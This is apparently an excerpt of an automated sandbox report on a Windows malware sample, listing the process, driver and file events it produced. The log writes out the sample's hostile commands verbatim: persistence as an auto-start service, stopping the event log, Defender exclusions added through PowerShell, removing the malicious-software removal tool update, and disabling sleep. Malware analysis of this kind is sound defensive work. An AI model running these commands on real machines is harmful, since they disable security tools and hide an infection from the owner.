            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OAQXWXCL"
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe create "OAQXWXCL" binpath= "C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe" start= "auto"
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop eventlog
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe start "OAQXWXCL"
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknown | Process created: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
            Source: C:\Windows\System32\powercfg.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Process created: C:\Windows\explorer.exe explorer.exe
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Section loaded: apphelp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: powrprof.dll
            Source: C:\Windows\System32\powercfg.exe | Section loaded: umpdc.dll
            Source: C:\Windows\System32\wusa.exeSection loaded: dpx.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: wtsapi32.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wusa.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\explorer.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: userenv.dll
            Source: C:\Windows\explorer.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\explorer.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\explorer.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\explorer.exe | Section loaded: sspicli.dll
            Source: C:\Windows\explorer.exe | Section loaded: powrprof.dll
            Source: C:\Windows\explorer.exe | Section loaded: umpdc.dll
            Source: C:\Windows\explorer.exe | Section loaded: mswsock.dll
            Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Windows\explorer.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Windows\explorer.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: napinsp.dll
            Source: C:\Windows\explorer.exe | Section loaded: pnrpnsp.dll
            Source: C:\Windows\explorer.exe | Section loaded: wshbth.dll
            Source: C:\Windows\explorer.exe | Section loaded: nlaapi.dll
            Source: C:\Windows\explorer.exe | Section loaded: winrnr.dll
            Source: C:\Windows\explorer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\explorer.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\explorer.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\explorer.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\explorer.exe | Section loaded: amsi.dll
            Source: C:\Windows\explorer.exe | Section loaded: profapi.dll
            Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: aA45th2ixY.exe | Static PE information: Image base 0x140000000 > 0x60000000
            Source: aA45th2ixY.exe | Static file information: File size 2684712 > 1048576
            Source: aA45th2ixY.exe | Static PE information: Raw size of .data is bigger than: 0x100000 < 0x27de00
            Source: aA45th2ixY.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: kgpcbqezuufy.exe, 00000017.00000003.1829947065.0000025D41510000.00000004.00000001.00020000.00000000.sdmp
            Source: aA45th2ixY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: aA45th2ixY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: aA45th2ixY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: aA45th2ixY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: aA45th2ixY.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: aA45th2ixY.exe | Static PE information: section name: .00cfg
            Source: kgpcbqezuufy.exe.0.dr | Static PE information: section name: .00cfg
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Code function: 0_2_00007FF6E17D1394 push qword ptr [00007FF6E17DB004h]; ret 0_2_00007FF6E17D1403
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | Code function: 23_2_00007FF7B9E81394 push qword ptr [00007FF7B9E8B004h]; ret 23_2_00007FF7B9E81403
            Source: C:\Windows\System32\conhost.exe | Code function: 35_2_0000000140001394 push qword ptr [0000000140009004h]; ret 35_2_0000000140001403

            Persistence and Installation Behavior

            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | File created: C:\Windows\TEMP\hnkcgwelkfzn.sys
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | File created: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe
            Source: C:\ProgramData\pcjszeyeitsp\kgpcbqezuufy.exe | File created: C:\Windows\Temp\hnkcgwelkfzn.sys
            Source: C:\Users\user\Desktop\aA45th2ixY.exe | Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe delete "OAQXWXCL"

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
